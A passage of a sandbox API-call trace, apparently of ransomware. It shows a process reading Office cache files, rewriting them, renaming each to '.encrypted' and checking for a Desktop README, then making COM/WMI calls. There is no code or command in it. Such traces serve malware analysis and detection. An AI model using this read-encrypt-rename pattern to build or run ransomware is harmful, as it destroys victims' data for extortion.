Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0237.238] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0237.238] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0237.240] GetFileType (hFile=0x280) returned 0x1 [0237.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0237.240] GetFileType (hFile=0x280) returned 0x1 [0237.240] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x10b2 [0237.240] ReadFile (in: hFile=0x280, lpBuffer=0x229ca3c, nNumberOfBytesToRead=0x10b2, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x229ca3c*, lpNumberOfBytesRead=0x2ee7d4*=0x10b2, lpOverlapped=0x0) returned 1 [0237.241] CloseHandle (hObject=0x280) returned 1 [0237.652] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0237.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0237.652] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0237.653] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0237.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0237.653] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0237.653] GetFileType (hFile=0x280) returned 0x1 [0237.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0237.653] GetFileType (hFile=0x280) returned 0x1 [0237.653] WriteFile (in: hFile=0x280, lpBuffer=0x2299bdc*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x2299bdc*, lpNumberOfBytesWritten=0x2ee7c4*=0x10c0, lpOverlapped=0x0) returned 1 [0237.654] CloseHandle (hObject=0x280) returned 1 [0237.654] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0237.654] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.encrypted", lpFilePart=0x0) returned 0x57 [0237.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0237.655] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x940c2a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x940c2a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0x733183a0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x10c0)) returned 1 [0237.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0237.655] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.encrypted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.encrypted")) returned 1 [0237.656] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpFilePart=0x0) returned 0x4b [0237.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0237.656] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0237.731] GetFileType (hFile=0x280) returned 0x1 [0237.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0237.732] GetFileType (hFile=0x280) returned 0x1 [0237.732] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x228df5c [0237.849] ReadFile (in: hFile=0x280, lpBuffer=0x9551018, nNumberOfBytesToRead=0x228df5c, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x9551018*, lpNumberOfBytesRead=0x2ee7d4*=0x228df5c, lpOverlapped=0x0) returned 1 [0238.754] CloseHandle (hObject=0x280) returned 1 [0242.894] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0242.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0242.895] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0242.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0242.895] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpFilePart=0x0) returned 0x4b [0242.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0242.895] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0242.899] GetFileType (hFile=0x280) returned 0x1 [0242.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0242.899] GetFileType (hFile=0x280) returned 0x1 [0242.899] WriteFile (in: hFile=0x280, lpBuffer=0xc551018*, nNumberOfBytesToWrite=0x228df60, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0xc551018*, lpNumberOfBytesWritten=0x2ee7c4*=0x228df60, lpOverlapped=0x0) returned 1 [0245.459] CloseHandle (hObject=0x280) returned 1 [0245.460] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpFilePart=0x0) returned 0x4b [0245.460] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.encrypted", lpFilePart=0x0) returned 0x55 [0245.460] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0245.460] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x147e5b00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x147e5b00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0x77da1480, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x228df60)) returned 1 [0245.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0245.460] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.encrypted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.encrypted")) returned 1 [0245.461] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0245.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0245.461] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0245.462] GetFileType (hFile=0x280) returned 0x1 [0245.462] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0245.462] GetFileType (hFile=0x280) returned 0x1 [0245.462] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x41d4 [0245.462] ReadFile (in: hFile=0x280, lpBuffer=0x224c780, nNumberOfBytesToRead=0x41d4, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x224c780*, lpNumberOfBytesRead=0x2ee7d4*=0x41d4, lpOverlapped=0x0) returned 1 [0245.464] CloseHandle (hObject=0x280) returned 1 [0245.514] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0245.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0245.514] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0245.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0245.515] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0245.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0245.515] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0245.516] GetFileType (hFile=0x280) returned 0x1 [0245.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0245.516] GetFileType (hFile=0x280) returned 0x1 [0245.516] WriteFile (in: hFile=0x280, lpBuffer=0x22ae0dc*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x22ae0dc*, lpNumberOfBytesWritten=0x2ee7c4*=0x41e0, lpOverlapped=0x0) returned 1 [0245.517] CloseHandle (hObject=0x280) returned 1 [0245.517] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0245.517] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.encrypted", lpFilePart=0x0) returned 0x57 [0245.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0245.517] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x77e138a0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x41e0)) returned 1 [0245.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0245.518] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.encrypted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.encrypted")) returned 1 [0245.518] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab", lpFilePart=0x0) returned 0x4a [0245.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0245.519] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0245.519] GetFileType (hFile=0x280) returned 0x1 [0245.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0245.519] GetFileType (hFile=0x280) returned 0x1 [0245.520] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0xa97cbdb [0245.956] ReadFile (in: hFile=0x280, lpBuffer=0x23501018, nNumberOfBytesToRead=0xa97cbdb, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x23501018*, lpNumberOfBytesRead=0x2ee7d4*=0xa97cbdb, lpOverlapped=0x0) returned 1 [0252.449] CloseHandle (hObject=0x280) returned 1 Thread: id = 224 os_tid = 0x57c Thread: id = 225 os_tid = 0x560 [0129.130] CoGetContextToken (in: pToken=0x441f4bc | out: pToken=0x441f4bc) returned 0x800401f0 [0129.136] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0151.953] CoGetContextToken (in: pToken=0x441f4b0 | out: pToken=0x441f4b0) returned 0x0 [0151.954] CoGetContextToken (in: pToken=0x441f438 | out: pToken=0x441f438) returned 0x0 [0151.954] WbemLocator:IUnknown:Release (This=0x73b0b30) returned 0x1 [0151.954] WbemLocator:IUnknown:Release (This=0x73b0b30) returned 0x0 [0151.954] CoGetContextToken (in: pToken=0x441f4b0 | out: pToken=0x441f4b0) returned 0x0 [0151.954] CoGetContextToken (in: pToken=0x441f438 | out: pToken=0x441f438) returned 0x0 [0151.954] WbemDefPath:IUnknown:Release (This=0x73b0820) returned 0x1 [0151.954] WbemDefPath:IUnknown:Release (This=0x73b0820) returned 0x0 [0151.954] CoGetContextToken (in: pToken=0x441f4b0 | out: pToken=0x441f4b0) returned 0x0 [0151.954] IUnknown:QueryInterface (in: This=0x73bfc8, riid=0x74c13c98*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x441f458 | out: ppvObject=0x441f458*=0x73bfd8) returned 0x0 [0151.954] CObjectContext::ContextCallback () Thread: id = 226 os_tid = 0x55c Thread: id = 227 os_tid = 0x588 [0150.376] CoGetContextToken (in: pToken=0x49bf91c | out: pToken=0x49bf91c) returned 0x0 [0150.376] IUnknown:QueryInterface (in: This=0x73c138, riid=0x74cbd8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x49bf940 | out: ppvObject=0x49bf940*=0x73c144) returned 0x0 [0150.376] IComThreadingInfo:GetCurrentThreadType (in: This=0x73c144, pThreadType=0x49bf96c | out: pThreadType=0x49bf96c*=0) returned 0x0 [0150.376] IUnknown:Release (This=0x73c144) returned 0x1 Thread: id = 228 os_tid = 0x360 Thread: id = 229 os_tid = 0x358 [0132.405] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0132.473] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x877f134 | out: lpiid=0x877f134) returned 0x0 [0132.475] CoGetClassObject (in: rclsid=0x76e9ec*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74c1d1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x877ee48 | out: ppv=0x877ee48*=0x73b0810) returned 0x0 [0132.630] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b0810, riid=0x74c50ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x877f060 | out: ppvObject=0x877f060*=0x0) returned 0x80004002 [0132.630] WbemDefPath:IClassFactory:CreateInstance (in: This=0x73b0810, pUnkOuter=0x0, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x877f074 | out: ppvObject=0x877f074*=0x73b0820) returned 0x0 [0132.630] WbemDefPath:IUnknown:Release (This=0x73b0810) returned 0x0 [0132.630] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b0820, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x877ec94 | out: ppvObject=0x877ec94*=0x73b0820) returned 0x0 [0132.631] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b0820, riid=0x74cbfc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x877ec50 | out: ppvObject=0x877ec50*=0x0) returned 0x80004002 [0132.631] WbemDefPath:IUnknown:AddRef (This=0x73b0820) returned 0x3 [0132.631] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b0820, riid=0x74cbf90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x877e5ac | out: ppvObject=0x877e5ac*=0x0) returned 0x80004002 [0132.631] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b0820, riid=0x74cbf860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x877e55c | out: ppvObject=0x877e55c*=0x0) returned 0x80004002 [0132.631] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b0820, riid=0x74cac350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x877e568 | out: ppvObject=0x877e568*=0x76e250) returned 0x0 [0132.631] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x76e250, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x877e570 | out: pCid=0x877e570*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0132.631] WbemDefPath:IUnknown:Release (This=0x76e250) returned 0x3 [0132.631] CoGetContextToken (in: pToken=0x877e5c8 | out: pToken=0x877e5c8) returned 0x0 [0132.632] CoGetContextToken (in: pToken=0x877e9d0 | out: pToken=0x877e9d0) returned 0x0 [0132.632] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b0820, riid=0x74cbfb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x877ea60 | out: ppvObject=0x877ea60*=0x0) returned 0x80004002 [0132.632] WbemDefPath:IUnknown:Release (This=0x73b0820) returned 0x2 [0132.632] WbemDefPath:IUnknown:Release (This=0x73b0820) returned 0x1 [0132.632] SetEvent (hEvent=0x250) returned 1 [0132.640] CoGetClassObject (in: rclsid=0x76e9ec*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74c1d1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x877ee48 | out: ppv=0x877ee48*=0x73b08f0) returned 0x0 [0132.640] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b08f0, riid=0x74c50ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x877f060 | out: ppvObject=0x877f060*=0x0) returned 0x80004002 [0132.640] WbemDefPath:IClassFactory:CreateInstance (in: This=0x73b08f0, pUnkOuter=0x0, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, 